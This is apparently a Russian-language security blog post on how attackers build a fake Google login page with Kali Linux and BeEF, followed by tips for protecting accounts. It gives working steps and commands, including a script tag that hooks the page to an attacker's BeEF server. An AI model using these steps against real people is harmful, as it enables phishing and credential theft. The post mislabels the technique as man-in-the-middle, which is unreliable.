top of page

Взлом через ссылку и как от этого защититься

Часто мне приходят вопросы по-типу: «Можно взломать аккаунт через ссылку?». В данной статье я отвечу на этот вопрос и покажу, как это делают хакеры с помощью Kali Linux и BeEF.

Всем салют, дорогие друзья! Часто мне приходят вопросы по-типу: «Можно взломать аккаунт через ссылку?». В данной статье я отвечу на этот вопрос и покажу, как это делают хакеры с помощью Kali Linux и BeEF.

Данный материал будет полезен новичкам и даже обычным пользователям. Изучение и понимание методов взлома и проникновения, поможет вам в соблюдении кибергигиены.
 

Нам понадобится

Итак, нам понадобится дистрибутив Kali Linux и фреймворк эксплуатации браузеров BeEF (Browser Exploit Framework). Это инструмент для взлома, который фокусируется на браузерах.


BeEF позволяют создать фейк-страницу, содержащую JavaScript и менять контент в зависимости от конкретной жертвы.

 

Установка BeEF на Kali Linux

Для установки BeEF на Kali Linux используем следующую команду:

sudo apt install beef-xss

Когда установка завершится, находим в приложениях фреймворк и запускаем пункт «beef start».

После этого откроется терминал, в котором будет предложено ввести новый пароль для веб-интерфейса BeEF. Также необходимо скопировать хук и сохранить в каком-нибудь текстовом файле. Позже нам будет необходимо вставить его в фейк-страницу.

Через несколько секунд браузер автоматически откроет веб-интерфейс BeEF. Самое время войти, используя созданную ранее учетную запись.

 

Создание фейк-страницы

Для этого примера предлагаю использовать страницу Google. Клонируем страницу Google из репозитория GitHub:

git clone https://github.com/anirudhbelwadi/Google-Landing-Page.git

Теперь отредактируем файл index.html и вставим ссылку на файл hook.js с сервера BeEF между тегами head:

<script src="http://<IP>:3000/hook.js"></script>

Проверим работу сервера с помощью python http.server, введя в терминале комманду:

python3 -m http.server 80

Открываем браузер и видим нашу фейк-страницу (поддельный сайт):

✅ Как видно на скрине выше, фейк-страница работает корректно. Супер!

 

Взлом через ссылку

Для получения внешнего IP злоумышленник будет использовать облачные сервисы и зарегистрирует какой-нибудь похожий на google.ru домен. Может подойти и бесплатный домен:

Далее все просто: пользователь нечего не подозревая вводит логин и пароль, а хакер, соответственно, получает эти данные.

 

Защита от взлома через ссылку и фейк-страницу

Я подготовил для вас несколько простых рекомендаций для защиты от подобной атаки:

  • Никогда не доверяйте полученным ссылкам. Особенное подозрение должны вызвать скрытые или укороченный ссылки. Перед переходом по такой ссылке, стоит расшифровать короткую ссылку и определить куда она ведет.

  • Всегда проверяйте домен (название сайта), когда хотите ввести учетные данные авторизации.

  • По возможности используйте расширение для блокировки JavaScript.

  • Никогда не заходите в свои аккаунты используя публичный сети WiFi. Для проверки почты или авторизации в соцсетях лучше использовать мобильную связь или надежный VPN.

 

Заключение

Рассмотренный в данной статье способ атаки называется MITM (человек посередине). Техника заключается в том, чтобы создать поддельный сайт и поддельный домен, а затем отправить пользователю фишинговое письмо с ссылкой на фейк-страницу. Данный вид атаки приносит лучший результат в связке с социальной инженерией.


✅ Теперь вы знаете, что взломать через ссылку вполне возможно, в особенности, если пользователь не интересуется информационной безопасностью.




202 просмотра

Недавние посты

Смотреть все
bottom of page